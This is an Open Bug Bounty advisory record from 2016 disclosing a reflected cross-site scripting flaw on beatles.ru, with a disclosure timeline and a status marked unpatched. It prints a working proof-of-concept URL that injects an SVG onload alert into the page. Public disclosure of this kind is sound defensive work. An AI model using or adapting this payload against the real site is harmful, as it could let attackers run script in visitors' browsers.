beatles.ru XSS vulnerability

2016-09-01T14:50:00
ID OBB:179251
Type openbugbounty
Reporter amlnspqr
Modified 2016-09-15T15:12:00

Description

Vulnerable URL:
http://www.beatles.ru/"><svg onload=alert('XSSPOSED') x="/
</pre>

##### Details:

Description| Value  
---|---  
Patched:| No  
Latest check for patch:| 27.07.2017  
Vulnerability type:| XSS  
Vulnerability status:| Publicly disclosed  
Alexa Rank| 188524  
VIP website status:| No  
Check beatles.ru SSL connection:| (Grade: F)

##### Coordinated Disclosure Timeline:

Description| Value  
---|---  
Vulnerability submitted via Open Bug Bounty| 1 September, 2016 14:50 GMT  
Generic security notifications sent to website owner| 1 September, 2016 14:52 GMT  
Vulnerability details disclosed by researcher| 15 September, 2016 15:12 GMT